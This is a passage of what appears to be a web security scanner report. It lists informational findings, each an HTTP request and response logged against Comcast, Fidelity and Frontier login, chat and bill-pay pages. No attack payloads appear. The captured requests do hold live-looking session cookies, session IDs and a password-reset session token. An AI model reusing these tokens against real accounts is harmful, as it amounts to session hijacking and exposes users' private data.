Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...

23.12. https://www.comcast.com/Localization/QueryCompletion.cajax

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/QueryCompletion.cajax

Request

POST /Localization/QueryCompletion.cajax HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
Content-Length: 39
Origin: https://www.comcast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

{"Method":"GetKeywords","Arg":"\"xs\""}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:22:11 GMT
Connection: close

"{\"_keyword\":\"xs\",\"_result\":[]}"

23.13. https://www.comcastsupport.com/ChatEntry/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/

Request

GET /ChatEntry/ HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...

23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/favicon.ico

Request

GET /ChatEntry/Content/Images/favicon.ico HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331945055%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:29:08 GMT

............ .h.......(....... ..... .............................11..................................................94......77..........................................;6...........
..<5..        ........
...[SNIP]...

23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/mainbg.jpg

Request

GET /ChatEntry/Content/Images/mainbg.jpg HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1447
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

......Exif..II*.................Ducky.......<.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/Images/start_chat.png

Request

GET /ChatEntry/Content/Images/start_chat.png HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3467
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

.PNG
.
...IHDR.......#.....m.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Content/images/menubg.jpg

Request

GET /ChatEntry/Content/images/menubg.jpg HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1155
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:43 GMT

......Exif..II*.................Ducky.......<.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Forms/Suggestions.aspx

Request

GET /ChatEntry/Forms/Suggestions.aspx?searchValue=How+can+I+make+a+payment HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/ChatEntry/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331945055%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5476


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Before chatting, there may be a quick fix. Here are some suggestions...</title>
</head>
<body>
<form name="SuggestionsForm"
...[SNIP]...

23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/Forms/UserForm.aspx

Request

GET /ChatEntry/Forms/UserForm.aspx?subject=ACCOUNT+%26+BILL&surveySelect=Technical&queue=UIDpassword HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

...[SNIP]...

23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/eHelpProxy.asmx

Request

POST /ChatEntry/eHelpProxy.asmx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
Content-Length: 349
Origin: https://www.comcastsupport.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml; charset="UTF-8"
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/enve
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1574

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLS
...[SNIP]...

23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/img/xfinity/gradient.png

Request

GET /ChatEntry/img/xfinity/gradient.png HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI

Response

HTTP/1.1 200 OK
Content-Length: 5060
Content-Type: application/octet-stream
Content-Location: http://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:29:01 GMT

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

23.22. https://www.comcastsupport.com/chatentry/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /chatentry/Default.aspx

Request

GET /chatentry/Default.aspx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...

23.23. https://www.fidelity.com/welcome/200-free-trades

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:19 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

23.25. https://www.frontier.com/AgentOrdering/Login/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Request

GET /AgentOrdering/Login/ HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Request

POST /AgentOrdering/Login/Default.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 15546
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.27. https://www.frontier.com/BillPay/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Request

GET /BillPay/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 12
Origin: https://www.frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

23.29. https://www.frontier.com/Shop/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Request

GET /Shop/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
